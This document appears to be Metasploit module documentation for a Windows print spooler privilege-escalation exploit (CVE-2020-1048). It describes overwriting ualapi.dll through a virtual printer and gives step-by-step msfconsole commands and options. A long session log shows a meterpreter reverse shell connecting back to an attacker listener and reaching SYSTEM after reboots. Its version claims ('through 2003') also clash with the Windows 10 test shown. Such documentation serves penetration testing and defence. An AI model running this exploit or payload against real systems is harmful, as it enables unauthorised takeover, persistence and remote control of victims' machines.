## Vulnerable Application

Vulnerable versions for exploit
All unpatched windows through version 2003

### Introduction

This exploit relies on a bug where you can create a virtual printer
and print to trusted locations on the filesystem.  If a user chooses the
default overwrite, it may create a permanent backdoor.

Basically, this exploit creates a print job that writes to a trusted
location.  By selecting the location ```C:\windows\system32\ualapi.dll```
we abuse the spooler service twice.  The spooler will print to this
location when it restarts, then it will load the DLL into itself when it
restarts a second time.  The DLL will then be running as ```SYSTEM```.

When the printer is created, the target will show a pop-up saying a
printer was created.
A larger issue here is that the Spooler service does not like to stop.
Trying `sc stop` Spooler does not stop the spooler.
Killing the pid with a trusted process will kill it, but it restarts
automatically.
Using the `pendingFileRenameOperations` registry key also does not appear
to work.

## Verification Steps

 Start ```msfconsole```
 get session on a windows target that is not patched (and <= 2003)
 ```use windows/local/cve_2020_1048_printerdemon```
 ```set session <session>```
 ```set payload <payload>```
 ```set lhost <lhost>```
 ```set lport <lport>```
 ```run```
 Verify target reboots automagically if 
 reboot target again (yest it has to reboot again
 Verify you get a session

## Options

  **EXECUTE_DELAY**
  The time between uploading and running the exploit.  Default is 3
  seconds, but high-latency networks may require more time.

  **EXPLOIT_NAME**
  The name of the when it is uploaded to the target (%RAND% by default).
  
  **EXPLOIT_DIR**
  Directory to use for file upload and linking; this should not already
  exist. (%RAND% by default)

  **OVERWRITE_DLL**
  The remote location you would like to write to.  Default is
  ```C:\windows\system32\ualapi.dll```

  **PAYLOAD_NAME**
  The filename to use for the payload binary (%RAND% by default).
  This is the name of the dll payload when uploaded to the remote host.

  **RESTART_TARGET**
  This will restart the target to force the overwrite.  YOU WILL LOSE
  YOUR SESSION unless you have a method of persistence.
  The dll will not be run until a second reboot.

  **WRITEABLE_DIR**
  The directory to use the payload binary and uploaded payload.
  (%RAND% by default).

## Scenarios

### Tested on Windows10 x64 Release 1903

  ```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 2

[*] Started reverse TCP handler on 192.168.135.197:5555 
msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 2 opened (192.168.135.197:5555 -> 192.168.132.134:49675) at 2020-08-24 12:15:07 -0500

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-CL5L2IH\msfuser
meterpreter > getsystem
[-] 2001: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 2...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2020_1048_printerdemon 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > show options

Module options (exploit/windows/local/cve_2020_1048_printerdemon):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   EXECUTE_DELAY   3                yes       The number of seconds to delay between file upload and exploit launch
   EXPLOIT_NAME                     no        The filename to use for the exploit binary (%RAND% by default).
   OVERWRITE_DLL                    no        Filename to overwrite (%WINDIR%\system32\ualapi.dll by default).
   PAYLOAD_NAME                     no        The filename for the payload to be used on the target host (%RAND%.dll by default).
   RESTART_TARGET  true             yes       Restart the target after exploit (you will lose your session until a second reboot).
   SESSION         1                yes       The session to run this module on.
   WRITABLE_DIR                     no        Path to write binaries (%TEMP% by default).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64


msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set verbose true
verbose => true
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set disablepayloadhandler false
disablepayloadhandler => false
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set wfsdelay 600
wfsdelay => 600
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > run

msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set session 2
session => 2
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Checking Target
[*] Attempting to PrivEsc on DESKTOP-CL5L2IH via session ID: 2
[*] Build Number = 18362
[*] Uploading Payload
[*] Payload (5120 bytes) uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\UCPNtlof
[!] This exploit requires manual cleanup of the payload C:\Users\msfuser\AppData\Local\Temp\UCPNtlof
[*] Sleeping for 3 seconds before launching exploit
[*] Uploading exploit to DESKTOP-CL5L2IH as C:\Users\msfuser\AppData\Local\Temp\JkrbEDShseh.exe
[*] Exploit uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\JkrbEDShseh.exe
[*] Running Exploit
[*] Exploit output:
Printer created successfully
[*] Rebooting DESKTOP-CL5L2IH
[*] 192.168.132.134 - Meterpreter session 2 closed.  Reason: Died
```

After the auto-reboot, reboot again.
The first reboot performs the overwrite; the second loads the dll.

```
[*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 3 opened (192.168.135.197:4444 -> 192.168.132.134:49669) at 2020-08-24 12:19:49 -0500

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

```
